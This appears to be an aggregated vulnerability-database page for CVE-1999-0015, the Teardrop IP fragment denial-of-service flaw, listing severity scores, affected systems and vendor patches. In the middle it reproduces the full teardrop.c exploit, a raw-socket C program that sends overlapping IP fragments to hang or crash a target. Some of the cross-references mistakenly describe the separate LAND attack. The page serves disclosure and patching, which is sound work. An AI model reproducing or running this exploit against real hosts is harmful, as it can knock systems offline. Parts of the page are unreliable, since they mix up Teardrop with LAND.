CVE-1999-0015
CVSS 5.0
Published: 1997-12-16 00:00:00
Revised: 2009-03-04 00:00:06
NMCOES

[Original] Teardrop IP denial of service.


[CNNVD] Multiple vendor TCP/IP implementation Teardrop denial-of-service vulnerability (CNNVD-199712-010)

        
The TCP/IP network protocol stack, implemented by most operating systems for Internet connectivity, is the most widely used networking protocol.
The TCP/IP stack implementations in early Windows 3.1/95/NT systems and in the Linux kernel contain a vulnerability; a remote attacker can use it to mount a denial-of-service attack against a server, hanging or crashing the host.
The TCP/IP implementations in early Windows 3.1/95/NT systems and in Linux kernels before 2.0.32 have a problem reassembling malformed overlapping IP fragments; when the operating system receives such malformed fragments, the result can be abnormal and unstable system behaviour ranging from lost connections to a system crash. Information about this vulnerability can be found in newsgroups and mailing lists by searching for the keywords syndrop, overdrop and nestea.
        

- CVSS (base score)

CVSS score: 5 [Medium (MEDIUM)]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/o:hp:hp-ux:10.24  HP HP-UX 10.24
cpe:/o:netbsd:netbsd:1.1  NetBSD 1.1
cpe:/o:hp:hp-ux:11.00  HP-UX 11.00
cpe:/o:hp:hp-ux:10.16  HP HP-UX 10.16
cpe:/o:microsoft:windows_95:0.0a
cpe:/o:microsoft:windows_nt:3.5.1:sp2  Microsoft Windows NT 3.5.1 SP2
cpe:/o:sun:sunos:4.1.3u1  Sun SunOS 4.1.3u1
cpe:/o:hp:hp-ux:10.30  HP HP-UX 10.30
cpe:/o:hp:hp-ux:9.01  HP HP-UX 9.01
cpe:/o:sun:sunos:4.1.4  Sun SunOS 4.1.4
cpe:/o:microsoft:windows_nt:4.0:sp1  Microsoft Windows NT 4.0 SP1
cpe:/o:hp:hp-ux:9.03  HP HP-UX 9.03
cpe:/o:microsoft:windows_nt:4.0  Microsoft Windows NT 4.0
cpe:/o:hp:hp-ux:10.20  HP HP-UX 10.20
cpe:/o:microsoft:windows_nt:3.5.1  Microsoft Windows NT 3.5.1
cpe:/o:microsoft:windows_nt:4.0:sp2  Microsoft Windows NT 4.0 SP2
cpe:/o:microsoft:windows_nt:3.5.1:sp1  Microsoft Windows NT 3.5.1 SP1
cpe:/o:netbsd:netbsd:1.2.1  NetBSD 1.2.1
cpe:/o:netbsd:netbsd:1.2  NetBSD 1.2
cpe:/o:netbsd:netbsd:1.0  NetBSD 1.0
cpe:/o:hp:hp-ux:9.07  HP HP-UX 9.07
cpe:/o:hp:hp-ux:9.05  HP HP-UX 9.05
cpe:/o:hp:hp-ux:9.00  HP HP-UX 9.00
cpe:/o:hp:hp-ux:9.04  HP HP-UX 9.04
cpe:/o:hp:hp-ux:10.01  HP HP-UX 10.01
cpe:/o:hp:hp-ux:10  HP HP-UX 10

- OVAL (technical details for detection)

oval:org.mitre.oval:def:5579  A TCP SYN packet with target host's address as both source and destination can cause system hangs.
* OVAL describes in detail the method for detecting this vulnerability; more technical details on detecting it can be found in the related OVAL definition.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0015
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0015
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199712-010
(official data source) CNNVD

- Other links and resources

- Vulnerability information

Multiple vendor TCP/IP implementation Teardrop denial-of-service vulnerability
Medium severity  Input validation
1997-12-16 00:00:00  2009-03-04 00:00:00
Remote
        
        

- Advisories and patches

Temporary workaround:
If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
* There is no suitable temporary workaround.
Vendor patches:
Linux
-----
The vendor has fixed this vulnerability in kernel versions 2.0.32 and later; download the new kernel version from the vendor's home page:

http://www.kernel.org

Microsoft
---------
Microsoft has released patches for this issue:
Patch download:
 * Windows 95

http://support.microsoft.com/download/support/mslfiles/Vipup11.exe

http://support.microsoft.com/download/support/mslfiles/Vipup20.exe
(Winsock 2.0)
 * Windows NT Patch
 ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40/hotfixes-postSP3/simptcp-fix/

- Vulnerability information (19103)

HP HP-UX <= 10.34,Microsoft Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 (EDBID:19103)
linux remote
1997-11-13 Verified
0 G P R
N/A
source: http://www.securityfocus.com/bid/124/info

The Teardrop denial of service attack exploits a flaw inherent to multiple vendor TCP/IP stacks. The problem lies in how the TCP/IP stack handles reassembly of fragmented IP packets.

This attack can be delivered by sending 2 or more specially fragmented IP datagrams. The first is the 0 offset fragment with a payload of size N, with the MF bit on (data content is irrelevant). The second is the last fragment (MF == 0) with a positive offset < N and with a payload of < N.

This results in the TCP/IP stack allocating unusually large resources to reassembling the packet(s). Depending on the memory deployed on the target box this usually results in the system freezing due to insufficient memory or in some cases causes the machine to reboot.

------[Begin] -- Guby Linux -------------------------------------------------

/*
* Copyright (c) 1997 route|daemon9 <route@infonexus.com> 11.3.97
*
* Linux/NT/95 Overlap frag bug exploit
*
* Exploits the overlapping IP fragment bug present in all Linux kernels and
* NT 4.0 / Windows 95 (others?)
*
* Based off of: flip.c by klepto
* Compiles on: Linux, *BSD*
*
* gcc -O2 teardrop.c -o teardrop
* OR
* gcc -O2 teardrop.c -o teardrop -DSTRANGE_BSD_BYTE_ORDERING_THING
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>

#ifdef STRANGE_BSD_BYTE_ORDERING_THING
/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n) (n)
#else /* OpenBSD 2.1, all Linux */
#define FIX(n) htons(n)
#endif /* STRANGE_BSD_BYTE_ORDERING_THING */

#define IP_MF 0x2000 /* More IP fragment en route */
#define IPH 0x14 /* IP header size */
#define UDPH 0x8 /* UDP header size */
#define PADDING 0x1c /* datagram frame padding for first packet */
#define MAGIC 0x3 /* Magic Fragment Constant (tm). Should be 2 or 3 */
#define COUNT 0x1 /* Linux dies with 1, NT is more stalwart and can
* withstand maybe 5 or 10 sometimes... Experiment.
*/
void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);

int main(int argc, char **argv)
{
int one = 1, count = 0, i, rip_sock;
u_long src_ip = 0, dst_ip = 0;
u_short src_prt = 0, dst_prt = 0;
struct in_addr addr;

fprintf(stderr, "teardrop route|daemon9\n\n");

if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
perror("raw socket");
exit(1);
}
if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
< 0)
{
perror("IP_HDRINCL");
exit(1);
}
if (argc < 3) usage(argv[0]);
if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
{
fprintf(stderr, "What the hell kind of IP address is that?\n");
exit(1);
}

while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
{
switch (i)
{
case 's': /* source port (should be emphemeral) */
src_prt = (u_short)atoi(optarg);
break;
case 't': /* dest port (DNS, anyone?) */
dst_prt = (u_short)atoi(optarg);
break;
case 'n': /* number to send */
count = atoi(optarg);
break;
default :
usage(argv[0]);
break; /* NOTREACHED */
}
}
srandom((unsigned)(time((time_t)0)));
if (!src_prt) src_prt = (random() % 0xffff);
if (!dst_prt) dst_prt = (random() % 0xffff);
if (!count) count = COUNT;

fprintf(stderr, "Death on flaxen wings:\n");
addr.s_addr = src_ip;
fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
addr.s_addr = dst_ip;
fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
fprintf(stderr, " Amt: %5d\n", count);
fprintf(stderr, "[ ");

for (i = 0; i < count; i++)
{
send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
fprintf(stderr, "b00m ");
usleep(500);
}
fprintf(stderr, "]\n");
return (0);
}

/*
* Send two IP fragments with pathological offsets. We use an implementation
* independent way of assembling network packets that does not rely on any of
* the diverse O/S specific nomenclature hinderances (well, linux vs. BSD).
*/

void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
u_short dst_prt)
{
u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */
u_char byte; /* a byte */
struct sockaddr_in sin; /* socket protocol structure */

sin.sin_family = AF_INET;
sin.sin_port = src_prt;
sin.sin_addr.s_addr = dst_ip;

/*
* Grab some memory for our packet, align p_ptr to point at the beginning
* of our packet, and then fill it with zeros.
*/
packet = (u_char *)malloc(IPH + UDPH + PADDING);
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

byte = 0x45; /* IP version and header length */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING); /* total length */
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); /* IP id */
p_ptr += 2;
*((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; /* IP TTL */
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &byte, sizeof(u_char));
p_ptr += 4; /* IP checksum filled in by kernel */
*((u_long *)p_ptr) = src_ip; /* IP source address */
p_ptr += 4;
*((u_long *)p_ptr) = dst_ip; /* IP destination address */
p_ptr += 4;
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(8 + PADDING); /* UDP total length */

if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}

/* We set the fragment offset to be inside of the previous packet's
* payload (it overlaps inside the previous packet) but do not include
* enough payload to cover complete the datagram. Just the header will
* do, but to crash NT/95 machines, a bit larger of packet seems to work
* better.
*/
p_ptr = &packet[2]; /* IP total length is 2 bytes into the header */
*((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
p_ptr += 4; /* IP offset is 6 bytes into the header */
*((u_short *)p_ptr) = FIX(MAGIC);

if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
free(packet);
}

u_long name_resolve(u_char *host_name)
{
struct in_addr addr;
struct hostent *host_ent;

if ((addr.s_addr = inet_addr(host_name)) == -1)
{
if (!(host_ent = gethostbyname(host_name))) return (0);
bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
}
return (addr.s_addr);
}

void usage(u_char *name)
{
fprintf(stderr,
"%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",
name);
exit(0);
}

/* EOF */

------[End] -- Guby Linux ----------------------------------------------------
		

- Vulnerability information

5727
Multiple Vendor IP Fragment Re-Assembly Remote DoS (teardrop)
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- Vulnerability description

Multiple products contain a flaw that may allow a remote denial of service. The issue is triggered when specially crafted IP packet fragments are sent to a target, and will result in loss of availability for the platform.

- Timeline

1997-11-13 1997-11-13
1997-11-13 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, the affected vendors have released patches to address this vulnerability.

- References

- Vulnerability author

- Vulnerability information

Multiple Vendor Teardrop Denial of Service Vulnerability
Input Validation Error 124
Yes No
1997-11-13 12:00:00 2009-07-11 12:16:00
This problem was initially posted to the Bugtraq mailing list Thu, 13 Nov 1997 by G P R (route@RESENTMENT.INFONEXUS.COM). In this post Route credits an individual named Klepto as the person responsible for discovering the bug.

- Affected program versions

Microsoft Windows NT 3.5.1 SP4
Microsoft Windows NT 3.5.1 SP3
Microsoft Windows NT 3.5.1 SP2
Microsoft Windows NT 3.5.1 SP1
Microsoft Windows NT 4.0 SP3
+ Microsoft Windows NT Enterprise Server 4.0 SP3
+ Microsoft Windows NT Server 4.0 SP3
+ Microsoft Windows NT Terminal Server 4.0 SP3
+ Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT 4.0 SP2
+ Microsoft Windows NT Enterprise Server 4.0 SP2
+ Microsoft Windows NT Server 4.0 SP2
+ Microsoft Windows NT Terminal Server 4.0 SP2
+ Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT 4.0 SP1
+ Microsoft Windows NT Enterprise Server 4.0 SP1
+ Microsoft Windows NT Server 4.0 SP1
+ Microsoft Windows NT Terminal Server 4.0 SP1
+ Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT 4.0
+ Microsoft Windows NT Enterprise Server 4.0
+ Microsoft Windows NT Server 4.0
+ Microsoft Windows NT Terminal Server 4.0
+ Microsoft Windows NT Workstation 4.0
Microsoft Windows 95
HP HP-UX 10.34
HP HP-UX 10.30
HP HP-UX 10.8
HP HP-UX 10.10
HP HP-UX 10.0
HP HP-UX 9.10
HP HP-UX 9.9
HP HP-UX 9.8
HP HP-UX 9.7
HP HP-UX 9.6
HP HP-UX 9.5
HP HP-UX 9.4
HP HP-UX 9.3
HP HP-UX 9.1
HP HP-UX 9.0
Caldera OpenLinux Standard 1.2


- Solution

This fix information was made available (in an edited format) in the CERT/CC advisory CA-97.28.

Appendix A - Vendor Information

Below is a list of the vendors who have provided information for this advisory. We will update this appendix as we receive additional information. If you do not see your vendor's name, the CERT/CC did not hear from that vendor. Please contact the vendor directly.

Berkeley Software Design, Inc. (BSDI)
----------------------------------------------------

No version of BSD/OS is vulnerable to Teardrop.

Caldera Corporation
----------------------------

Topic 1 - Teardrop

Unless patched, Linux 2.0.x kernels prior to 2.0.32 are vulnerable. With the application of the kernel update described in Caldera Security Advisory SA-1997.29 (dated 3-Dec-1997), Caldera OpenLinux is not vulnerable. This Caldera advisory describes how to obtain and install the update and can be found at:

http://www.caldera.com/tech-ref/security/SA-1997.29.html

Other Caldera Security Advisories can be found at:

http://www.caldera.com/tech-ref/security/

Cisco Systems
----------------------

Topic 1 - Teardrop

Not vulnerable.

For more information reference URL: http://www.cisco.com/warp/public/770/land-pub.shtml

Digital Equipment Corporation
------------------------------------------

This reported problem is not present for Digital's ULTRIX or Digital UNIX Operating Systems Software.

The FreeBSD Project
------------------------------

Topic 1 - Teardrop

CSRG 4.4 is not vulnerable.

Hewlett-Packard Corporation
------------------------------------------

HPSBUX9801-076 SECURITY BULLETIN: #00076, 21 January 1998

Description: Security Vulnerability with land on HP-UX

The problem can be fixed by applying the appropriate cumulative ARPA Transport patch mentioned below.

HP-UX release 11.00, HP9000 Series 700/800: PHNE_14017
HP-UX release 10.30, HP9000 Series 700/800: PHNE_13671
HP-UX release 10.24, HP9000 Series 700: PHNE_13888
HP-UX release 10.24, HP9000 Series 800: PHNE_13889
HP-UX release 10.20, HP9000 Series 800: PHNE_13468
HP-UX release 10.20, HP9000 Series 700: PHNE_13469
HP-UX release 10.16, HP9000 Series 700: PHKL_14242
HP-UX release 10.16, HP9000 Series 800: PHKL_14243
HP-UX release 10.10, HP9000 Series 800: PHNE_13470
HP-UX release 10.10, HP9000 Series 700: PHNE_13471
HP-UX release 10.01, HP9000 Series 800: PHNE_13472
HP-UX release 10.01, HP9000 Series 700: PHNE_13473
HP-UX release 10.00, HP9000 Series 800: PHNE_13474
HP-UX release 10.00, HP9000 Series 700: PHNE_13475
HP-UX release 9.04, HP9000 Series 800: PHNE_13476
HP-UX release 9.0[3,5,7], HP9000 Series 700: PHNE_13477
HP-UX release 9.01, HP9000 Series 700: PHNE_13478
HP-UX release 9.00, HP9000 Series 800: PHNE_13479

IBM Corporation
------------------------

Topic 1 - Teardrop

AIX is not vulnerable.

NCR Corporation
-------------------------

Topic 1 - Teardrop

NCR MP-RAS TCP/IP implementation is not vulnerable.

The NetBSD Project
-----------------------------

Topic 1 - Teardrop

Versions 1.2 and above are not vulnerable.

Red Hat Software
-------------------------

Topic 1 - Teardrop

Linux is not vulnerable.

Sun Microsystems, Inc.
---------------------------------

Topic 1 - Teardrop

All releases of Solaris are not vulnerable. All supported versions of SunOS 4.1.x (4.1.3_U1 and 4.1.4) are not vulnerable.

-----End of Appendix A-----

Microsoft

NT4
-------
Microsoft has released a post Service Pack 3 hotfix for Windows NT 4.0. This hotfix has been archived at: ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/hotfixes-postSP3/archive/icmp-fix/

This fix was superseded by the teardrop2-fix, available at: ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/hotfixes-postSP3/teardrop2-fix/

These fixes were rolled-up into NT Service Pack 4.

NT3.51
-------
Microsoft has released a post Service Pack 5 hotfix for Windows NT 3.51. This hotfix has been included in the teardrop2 hotfix, available at:
ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT351/hotfixes-postSP5/teardrop2-fix/

- References

     

     
